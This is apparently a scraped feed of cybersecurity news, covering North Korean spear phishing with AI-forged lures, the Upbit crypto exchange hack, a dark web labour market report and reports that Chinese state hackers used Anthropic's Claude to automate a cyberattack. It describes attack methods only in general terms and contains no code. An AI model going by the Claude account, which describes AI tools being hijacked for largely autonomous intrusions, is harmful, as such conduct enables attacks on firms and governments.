According to a report from South Korean security firm AhnLab, state-linked hacking organizations like the North Korea-backed Lazarus Group relied heavily on spear phishing to steal funds and gather intelligence over the last 12 months. The group often posed as conference organizers, job contacts or colleagues to trick people into opening files or running commands.

Lazarus Group: Spear Phishing Turns More Realistic With AI Lures

Reports have disclosed that one unit known as Kimsuky used artificial intelligence to forge military ID images and lodge them inside a ZIP file to make messages look legitimate.

Security researchers say the fake IDs were convincing enough that recipients opened the attachments, which then ran hidden code. The incident has been traced to mid-July 2025 and appears to mark a step up in how attackers craft their lures.

The aim is simple. Get a user to trust a message, open a file, and the attacker gets a way in. That access can lead to stolen credentials, seeded malware or drained crypto wallets. The groups linked to Pyongyang have been tied to attacks on finance and defense targets, among others.

Lazarus Group Victims Asked To Execute Commands

Some campaigns did not rely only on hidden exploits. In several cases, targets were tricked into typing PowerShell commands themselves, sometimes while believing they were following official instructions.

That step lets attackers run scripts with high privileges without needing a zero-day. Security outlets have warned that this social trick is spreading and can be hard to spot.

Lazarus Group: Old File Types, New Tricks

Attackers also abused Windows shortcut files and similar formats to hide commands that run silently when a file is opened. Researchers have documented nearly 1,000 malicious .lnk samples tied to broader campaigns, showing that familiar file types remain a favorite delivery method. Those shortcuts can execute hidden arguments and pull down further payloads.

Why This Matters Now

This makes the attacks harder to stop: tailored messages, AI-forged visuals, and tricks that ask users to run code. Multi-factor authentication and software patches help, but training people to treat unusual requests with suspicion remains key. Security teams advocate basic safety nets: update, verify, and when in doubt, check with a known contact.

According to reports, Lazarus Group and Kimsuky continue to be active. Lazarus, based on AhnLab’s findings, received the most mentions in post-cybercrime analyses over the last 12 months. The group has been singled out for financially motivated hacks, while Kimsuky seems more focused on intelligence gathering and tailored deception.

Featured image from Anadolu, chart from TradingView

South Korea’s largest cryptocurrency exchange, Upbit, is currently under scrutiny by regulators following a significant hack that led to the unauthorized withdrawal of approximately $36.9 million in assets on the Solana (SOL) network. The breach impacted over 20 different tokens and has prompted Upbit to freeze assets on its platform while an investigation unfolds.

Lazarus Group Tied To Upbit Hack

Authorities are now investigating the possibility of North Korean involvement in the cyber attack. Reports suggest that a group affiliated with North Korea’s intelligence agency, the notorious Lazarus Group, may have orchestrated the hack, which Upbit has described as an “abnormal withdrawal.” 

This group has been consistently linked to several high-profile crypto heists in recent years, and the US Federal Bureau of Investigation (FBI) has identified North Korean cyber operations as one of the most sophisticated and persistent threats.

The recent attack coincidentally occurred just days before the sixth anniversary of a previous major breach, in which Upbit lost 342,000 Ethereum (ETH) to North Korean hackers. 

According to an unnamed government official, this latest hack bears similarities to a 2019 incident in which approximately 58 billion won in cryptocurrencies was stolen, also attributed to the Lazarus Group.

In response to the attack, the South Korean National Police Agency has launched an investigation into the matter, although officials have not provided further comments on the case. Upbit’s operator, Dunamu, confirmed that an in-depth investigation into the cause and extent of the asset outflow is currently underway.

Crypto Exchange Moves Funds To Cold Storage

The cryptocurrency exchange’s CEO Oh Kyung-seok stated that as soon as abnormal withdrawal activity was detected, Upbit promptly suspended all deposit and withdrawal services. 

“We are conducting a comprehensive inspection, prioritizing the protection of member assets,” he said in a notice to users. Following the discovery of the unauthorized transactions, Upbit has taken steps to freeze the affected funds wherever possible.

To prevent any further unauthorized transfers, the exchange has shifted all remaining assets to cold storage, ensuring “a secure environment for funds.” 

Upbit is also said to be working with relevant project teams to freeze assets on-chain, having already blocked a portion of the stolen funds related to the cryptocurrency Solayer (LAYER). The exchange has indicated that deposits and withdrawals will only resume once full security checks are completed.

Dunamu has vowed to reimburse customers for any losses with business funds as part of its commitment to its users. It remains to be seen what additional information the country’s authorities will release in the coming days, as well as potential refund deadlines for affected individuals.  

Featured image from DALL-E, chart from TradingView.com 

Upbit, South Korea’s biggest cryptocurrency exchange, said it found unusual withdrawals from one of its Solana hot wallets and moved quickly to stop trades and protect customers.

According to company statements and law enforcement sources, about 44.5 billion Korean won — roughly $32 million — vanished in the incident that surfaced late November 2025. Upbit paused deposits and withdrawals and said it would repay affected users from its own reserves.

Suspected North Korean Ties

Based on reports from investigators and industry watchers, authorities are examining links to the Lazarus Group, a cyber unit long tied to North Korea.

Security teams point to methods similar to earlier attacks attributed to the same group, including a major breach in 2019 that took 342,000 ETH from the exchange.

Officials say the pattern of rapid withdrawals, quick cross-chain transfers, and spreading funds across many wallets matches tactics used in past nation-linked operations.

today south korea blamed north korea for the upbit hack nice headline but that part came later

so what actually happened?

an unknown attacker drained a few of upbit’s hot wallets waited a bit then started moving funds across chains

at some point the hacker bridged usdc from… pic.twitter.com/swq8yjIOLR

— trix (@trixwtb) November 28, 2025

How The Funds Were Moved

Reports have disclosed that the stolen tokens were moved off Solana, converted through several bridges, and routed through multiple chains to make tracking harder.

Transfers happened fast and in many small transactions, which complicates tracing attempts on the blockchain. Blockchain analysts are combing transaction histories, but the bridge conversions and mixing steps slow down any straightforward recovery efforts.

On-Site Checks And Ongoing Forensics

Authorities have launched inspections at Upbit’s systems and are reviewing logs, admin access records, and wallet backups.

According to sources close to the probe, investigators suspect an admin credential compromise or impersonation rather than a simple software flaw in Upbit’s servers.

While evidence is still being gathered, forensic teams are looking for the entry point used to sign the withdrawal transactions and any indicators of outside control.

Investigation And Market Impact

The timing of the theft drew attention because it coincided with corporate news: Upbit’s parent, Dunamu, had public talk of a merger with Naver valued at about $10.3 billion.

Market players noted the coincidence, and some suggested the attack could aim to distract or unsettle stakeholders. For investors, exchanges, and regulators, the incident renews calls for stricter custody controls, better separation of hot and cold wallets, and clearer rules for large crypto platforms.

Yonhap News reports that South Korea’s largest crypto exchange, Upbit, suffered a hack worth about 44.5 billion KRW ($32 million). Authorities are investigating whether North Korea’s Lazarus Group was behind the attack. The group was also linked to Upbit’s 2019 theft of 58…

— Wu Blockchain (@WuBlockchain) November 28, 2025

Upbit has pledged full reimbursement to users hit by the theft and says it will share findings when the probe allows. Based on reports, tracing and recovery work is ongoing but will be slow because of how the assets were fragmented and moved across chains.

Watchers say confirmation of Lazarus involvement would mark another example of how state-linked actors continue to target major crypto firms.

Authorities have not yet publicly released a definitive attribution. The next steps to watch include any formal statements from prosecutors, whether any of the moved funds are frozen or returned, and how regulators will respond to reduce the chance of similar losses.

Featured image from Advance Innovations, chart from TradingView

Get a comprehensive, potentially lucrative ethical hacking education with 18 courses on today's top tools and tech. This bundle is just $34.97 for a limited time.

The post Price Drop: This Complete Ethical Hacking Bundle is Now $33 appeared first on TechRepublic.

Get a comprehensive, potentially lucrative ethical hacking education with 18 courses on today's top tools and tech. This bundle is just $34.97 for a limited time.

The post Price Drop: This Complete Ethical Hacking Bundle is Now $33 appeared first on TechRepublic.

Last week, AI company Anthropic reported with ‘high confidence’ that a Chinese state-sponsored hacking group had weaponized Anthropic’s own AI tools to run a largely automated cyberattack on several technology firms and government agencies. According to the company, the September operation is the first publicly known case of an AI system conducting target reconnaissance with only minimal human direction.

read more

Notorious hacking collective Scattered Lapsus$ Hunters takes credit for the breach that affected Salesforce customers’ data, and said it is planning another extortion campaign.

Salesforce said it’s investigating an incident where hackers compromised some of its customers' data after breaching customer experience company Gainsight.

In 2022, we published our research examining how IT specialists look for work on the dark web. Since then, the job market has shifted, along with the expectations and requirements placed on professionals. However, recruitment and headhunting on the dark web remain active.

So, what does this job market look like today? This report examines how employment and recruitment function on the dark web, drawing on 2,225 job-related posts collected from shadow forums between January 2023 and June 2025. Our analysis shows that the dark web continues to serve as a parallel labor market with its own norms, recruitment practices and salary expectations, while also reflecting broader global economic shifts. Notably, job seekers increasingly describe prior work experience within the shadow economy, suggesting that for many, this environment is familiar and long-standing.

The majority of job seekers do not specify a professional field, with 69% expressing willingness to take any available work. At the same time, a wide range of roles are represented, particularly in IT. Developers, penetration testers and money launderers remain the most in-demand specialists, with reverse engineers commanding the highest average salaries. We also observe a significant presence of teenagers in the market, many seeking small, fast earnings and often already familiar with fraudulent schemes.

While the shadow market contrasts with legal employment in areas such as contract formality and hiring speed, there are clear parallels between the two. Both markets increasingly prioritize practical skills over formal education, conduct background checks and show synchronized fluctuations in supply and demand.

Looking ahead, we expect the average age and qualifications of dark web job seekers to rise, driven in part by global layoffs. Ultimately, the dark web job market is not isolated — it evolves alongside the legitimate labor market, influenced by the same global economic forces.

In this report, you’ll find:

• Demographics of the dark web job seekers
• Their job preferences
• Top specializations on the dark web
• Job salaries
• Comparison between legal and shadow job markets

Get the report

The story of Ghost in the Shell’s main villain the Puppet Master hinted at a future where governments use hackers for espionage, at a time when most of the world had never connected to the internet.

Security researchers have developed the first functional defense mechanism capable of protecting against “cryptanalytic” attacks used to “steal” the model parameters that define how an AI system works.

read more

Governments across the Indo-Pacific are facing a critical question: who can be trusted to build and manage our most sensitive systems? Vendor choices, for everything from cloud infrastructure to identity platforms, are no longer just commercial; they are strategic. As cyber threats rise, supply chains fragment and coercive pressure grows, countries need better ways to assess technology providers and manage risk.

read more

Chinese state-backed hackers hijacked Anthropic’s Claude AI to run an autonomous global cyberattack, marking a major shift in AI-driven cyberwarfare.

The post Anthropic: China-Based Hackers Used Claude to Automate Global Cyberattack appeared first on TechRepublic.

Chinese state-backed hackers hijacked Anthropic’s Claude AI to run an autonomous global cyberattack, marking a major shift in AI-driven cyberwarfare.

The post Anthropic: China-Based Hackers Used Claude to Automate Global Cyberattack appeared first on TechRepublic.

Google is suing a Chinese phishing network behind $1B in global scams, aiming to shut down its Lighthouse platform and boost security with AI and passkeys.

The post Google Sues China-Based ‘Lighthouse’ Phishing Service After $1B+ Scams Target Millions appeared first on TechRepublic.

Google is suing a Chinese phishing network behind $1B in global scams, aiming to shut down its Lighthouse platform and boost security with AI and passkeys.

The post Google Sues China-Based ‘Lighthouse’ Phishing Service After $1B+ Scams Target Millions appeared first on TechRepublic.

Accusations of state-sponsored cyber espionage have come to define the cyber relations between the US and China over the years. The widespread adoption of Microsoft products has also made them prime targets for state-sponsored cyber espionage. High-profile incidents, such as the SolarWinds breach and attacks on Microsoft 365, have demonstrated how nation-state actors exploit vulnerabilities in Microsoft’s ecosystem to conduct sophisticated espionage operations.

read more

Companies often send out simulated—or fake—phishing emails to employees to see who takes the bait and click. Those who fall for such scams typically receive an on-the-spot lesson meant to help them recognize suspicious messages the next time.

These phishing simulations—known as embedded training because once users fail, they are sent into training mode—are widely considered to be a “best practice” in the cybersecurity anti-phishing industry.

read more

Telecommunications once seemed like the passive layer of critical infrastructure—pipes and switches that connected everything yet rarely drew attention. That perception ended long ago, particularly with the transition to 5G ecosystems.

read more

Since the COVID-19 pandemic, video conferencing platforms like Zoom and Microsoft Teams have become essential for work, education, and social connections. While these platforms offer controls such as disabling cameras and muting microphones to safeguard user privacy, a new study suggests that video conferencing may not be as secure as many assume.

read more